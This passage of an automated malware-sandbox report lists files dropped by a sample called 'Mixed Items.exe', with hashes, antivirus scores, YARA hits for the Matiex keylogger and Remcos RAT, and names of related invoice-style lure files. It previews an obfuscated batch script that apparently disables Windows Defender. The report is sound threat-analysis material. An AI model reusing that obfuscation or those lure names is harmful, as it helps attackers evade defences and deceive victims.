                                                                    NEW ORDERS 122020 2 x 40 HQ.exeGet hashmaliciousBrowse
                                                                      ORDER01032021rfggfscan.exeGet hashmaliciousBrowse
                                                                        FedEx's AWB#5305323204643.exeGet hashmaliciousBrowse
                                                                          believehot23 cccc.exeGet hashmaliciousBrowse
                                                                            order confirmation 6026022001.exeGet hashmaliciousBrowse
                                                                              PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                  RFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                                                                    CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                                                      PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                        DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                                          em6eElVbOm.exeGet hashmaliciousBrowse
                                                                                            Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                              Fireman.exeGet hashmaliciousBrowse
                                                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                  CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):0.5967038728698416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:balEk1GaD0JOCEfMuaaD0JOCEfMKQmD1JtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:baNGaD0JcaaD0JwQQ1JtAg/0bjSQJ
                                                                                                    MD5:8FBEB3EE575D3BBA44369DDECCA49083
                                                                                                    SHA1:8091ECF8CBF1A04AAEE7BF5C231C7605D8F8DAC0
                                                                                                    SHA-256:95D82888783EA084631ADCFBB236A44236D02A8088F04376AD017E9872EBC967
                                                                                                    SHA-512:A51ACB1EF5483FE64293992818201966FA063D3DD36DC67E74EF27EA5443B7E93A1A51485D0C67233BBF0A322949B9FEFD244C8AA60DCA5B48248A330D4F1745
                                                                                                    Malicious:false
                                                                                                    Preview: ....E..h..(.....(....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................(....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe423063f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.09585293764386119
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:d40+jRsXO4blof+8KH40+jRsXO4blof+8K:dH2fuH2f
                                                                                                    MD5:7369A0D21D0345333864DF57AC91E792
                                                                                                    SHA1:4735E40732F7147A9FC47F59338F29FD2812F0B3
                                                                                                    SHA-256:217612B92D702BCF7D388AAAFE46F93481793216F8A9428A02CBDBE4540C4DC5
                                                                                                    SHA-512:B2A5411F24F414778F003DC15665E1B9853B623E6E79CC23E7239662DC4FCD0671D951A510FEBE646C7FA5F745BADFDCB4E14B8936582351A5FEF7D2FD69EE22
                                                                                                    Malicious:false
                                                                                                    Preview: .#.?... ................e.f.3...w........................&..........w..(....y{.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................(....y{o.................-~>(....y{.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8192
                                                                                                    Entropy (8bit):0.11057603056041983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:h5G1EvNwr+q8l/bJdAtiVFMgerltAll:PXHq8t4E+A
                                                                                                    MD5:476D0CB871276EDB31AF5710A70C8768
                                                                                                    SHA1:EFD8C0036892FC78E9C9E6B2852CCE084C415544
                                                                                                    SHA-256:56A70A0A16A503D1624A38ACF08AF8A7654E9999A3611A3173A48B61BD280324
                                                                                                    SHA-512:5696AF6ACFFBAA8E029DFD0CAAB3DE1475C6405DD6ACB9538EABBDB472EF82B65E4CE8ADB4D5EBE75604000E45BE415E955BA43E450F48C67F228610F23FF5A6
                                                                                                    Malicious:false
                                                                                                    Preview: .u.......................................3...w..(....y{......w...............w.......w....:O.....w...................-~>(....y{.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58596
                                                                                                    Entropy (8bit):7.995478615012125
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                                    Malicious:false
                                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):3.1108462043257137
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kK7H/kwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:AwTJ6HkPlE99SNxAhUe0ht
                                                                                                    MD5:2355411028ACE02098EA05A848FF008B
                                                                                                    SHA1:2EDE017C6C12FD81FFFF0D987603C38FF0BF634D
                                                                                                    SHA-256:E16245600378AE119A841A1136ECBE5ECD6E5960AA1D9322DEAD68CD7EE199D4
                                                                                                    SHA-512:3DCD4EFC903F2C57FBA66895F7A05C4A7ADA1E9239644EBC7478C9C5EF9BBC570A2B43EB0D65683E18AE22E184B5B5E7D392FAD57EA53939A3940309FF3194A2
                                                                                                    Malicious:false
                                                                                                    Preview: p...... ........6.-.....(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mixed Items.exe.log
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.355304211458859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4Ks2f84jE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7r1qE4KE4j:MxHKXfvjHKnYHKhQnoPtHoxHhAHKzvrx
                                                                                                    MD5:4DC448082AFF363E7DB48FE0F4564674
                                                                                                    SHA1:BA956788D8EABC88D02119AC4B36EB16D26A2CA5
                                                                                                    SHA-256:0B882DACEECB3378A361B929BFF23F06DDAF5BEEF047B4BA87E8494C86899870
                                                                                                    SHA-512:0C3CC129DEAE19CC08E921E9A4C725D924539AAC2235D3FFFF6B270348E87A41318A1240C8D03422F62DB4728181BCBAC5CC7B216EE5DC34BA446F2A7233F1CE
                                                                                                    Malicious:true
                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b880
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):698
                                                                                                    Entropy (8bit):5.049094101509586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                                                                    MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                                                                    SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                                                                    SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                                                                    SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                                                                    Malicious:false
                                                                                                    Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11005962332311817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:26M7vBEzXm/Ey6q9995A+Sq3qQ10nMCldimE8eawHjc85Ev:262vLl68BLyMCldzE9BHjct
                                                                                                    MD5:08E0E756C0E25CF2F85281AF60D4D8D6
                                                                                                    SHA1:D6F1BB1FF8A041151322580BA5D2A4ACE28C9A1F
                                                                                                    SHA-256:767B4A3EF2DE563C663F2A0ACBA6F3D25070D9FC2CE9D8415261A523B5CFC77B
                                                                                                    SHA-512:2CA215A620C049089FB08761594B5E5F3AF363D455F6E1535AFDF0D00A8E0C599A0C15053628A9052E5574267DF3EA8431BCBB7D7F1FC7BF4693AF6DCA8F5464
                                                                                                    Malicious:false
                                                                                                    Preview: ....................................................................................<...E.J......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................0.:-..... .....t'..............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....<.....J.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11261316214328353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:VwEzXm/Ey6q9995A+H1miM3qQ10nMCldimE8eawHza1miIeEf:Ul68N1tMLyMCldzE9BHza1tIJ
                                                                                                    MD5:607110AB5B12714EDF520B297790FF69
                                                                                                    SHA1:1697CF656BF8DC0F7E6EFAC73306943C97FA289E
                                                                                                    SHA-256:4E1270D6142DCCD70ADBAA4C7D09367BE485011F43CC93F8CDB6B78A42093660
                                                                                                    SHA-512:800087C2DE73C41B0B944863D7148A6F87B96C4BBFDD2797DD28466E02675ECDF6ACAD350A2B470EC2A31B3E20DDAE8C953393DA92EE08DABD4999060C60FB12
                                                                                                    Malicious:false
                                                                                                    Preview: ....................................................................................<....8D......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................0.:-..... ......(..............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....<...D@D.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11257437134850665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:b2zXm/Ey6q9995A+Hg1mK2P3qQ10nMCldimE8eawHza1mKmAf:bjl68pg1iPLyMCldzE9BHza1R
                                                                                                    MD5:7FF245D22E936F26367E04D77759AB57
                                                                                                    SHA1:3044D4690AF81CC82163B6D3404E170333909B07
                                                                                                    SHA-256:38292B59D919010242643EC6C778F7AC1D78C8265F4FE9056F5C45F2A43A9D2E
                                                                                                    SHA-512:FD0F8A8E6ED5E96300F0BC364ECDE6E825FE74226D41EE47CF3D917D48A49F5E364E302106031E6E9ED11E0A6610A818F46F07DE2D7812E55364D1EAB66AF1EB
                                                                                                    Malicious:false
                                                                                                    Preview: ....................................................................................<....xA......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................0.:-..... ....................U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....<.....A.....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91000
                                                                                                    Entropy (8bit):6.241345766746317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: CN-Invoice-XXXXX9808-190111432879948.exe, Detection: malicious, Browse
                                                                                                    • Filename: Zahlungskopie.exe, Detection: malicious, Browse
                                                                                                    • Filename: Purchase Order.exe, Detection: malicious, Browse
                                                                                                    • Filename: Reversing Purchase Orders.exe, Detection: malicious, Browse
                                                                                                    • Filename: NEW ORDERS 122020 2 x 40 HQ.exe, Detection: malicious, Browse
                                                                                                    • Filename: ORDER01032021rfggfscan.exe, Detection: malicious, Browse
                                                                                                    • Filename: FedEx's AWB#5305323204643.exe, Detection: malicious, Browse
                                                                                                    • Filename: believehot23 cccc.exe, Detection: malicious, Browse
                                                                                                    • Filename: order confirmation 6026022001.exe, Detection: malicious, Browse
                                                                                                    • Filename: PROFORMA INVOICE.exe, Detection: malicious, Browse
                                                                                                    • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                    • Filename: RFQ - REF 208056-pdf.exe, Detection: malicious, Browse
                                                                                                    • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious, Browse
                                                                                                    • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                    • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                    • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                    • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                    • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                    • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                    • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8399
                                                                                                    Entropy (8bit):4.665734428420432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                    Malicious:false
                                                                                                    Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                    C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):455680
                                                                                                    Entropy (8bit):5.4156534240521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:L09yLLuWoujzz/DCBGNv5lToO7OsWXiOV:L09yLyWoujHDX5QO7OvXik
                                                                                                    MD5:80C61B903400B534858D047DD0919F0E
                                                                                                    SHA1:D0AB5400B74392308140642C75F0897E16A88D60
                                                                                                    SHA-256:25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
                                                                                                    SHA-512:B3216F0E4E95C7F50BCCBA5FDCCA2AD622A42379383BE855546FA1E0BAC41A6BEEA8226F8634AD5E0D8596169E0443494018BBE70B7052F094402AECAA038BCE
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 90%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................~.... ... ....@.. .......................`............@.................................$...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............x..........x'...h.....................................................................................................................................................................RNK\ZJO@F.EYC.G.IOYKJ._R_CEESEPPlj}ez|"hzfSn`ssdh~DNwq//M\`tdv`|..;.....4......Ewqus._/.....V>..%9%(:&##b?`LLJN.56(,*:.}.2=4lwY_.............................................................................................................A.{YOLI..qAL.tTDY^..v^NY
                                                                                                    C:\Users\user\AppData\Local\Temp\Purchase Order.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):466432
                                                                                                    Entropy (8bit):6.58109326592699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Lp85GzC+LZ5DsOwPEsfI2Mt23o/ZMBoYC:W+LZxsJI2M03eZN
                                                                                                    MD5:4983412EC34657BAB4A9BD56617B9960
                                                                                                    SHA1:2A5F9B3FA44597CF439B10B6337A4D1D98197A71
                                                                                                    SHA-256:76C2025CB8251393360BAAC07498C75BAB91A4DB229667F3E6ED2EC89CBEA6D6
                                                                                                    SHA-512:7A786CFC1299CCA28CF3A1A96E3280531F606284392327359A8EED0ABFC47C0C3FFD9BC77C0F7828975047A65DFCD7FDFEEEC50F3BF1C87AFA24C35B2D88612B
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, Author: Joe Security
                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, Author: unknown
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......oj.-+..~+..~+..~..{~9..~..y~...~..x~5..~x(.~)..~f(.~*..~..M~*..~.U..1..~.U.....~.U.....~"s.~8..~+..~2..~.U..v..~.Uu~*..~.U..*..~Rich+..~........................PE..L.....>`..................................... ....@.......................................@..................................v..........8K...................@...8.. \..8....................\......X\..@............ ..d............................text............................... ..`.rdata...n... ...p..................@..@.data...<=..........................@....tls................................@....gfids..0...........................@..@.rsrc...8K.......L..................@..@.reloc...8...@...:..................@..B........................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jnw4mcb.ygh.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4s1cg2kf.1xe.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
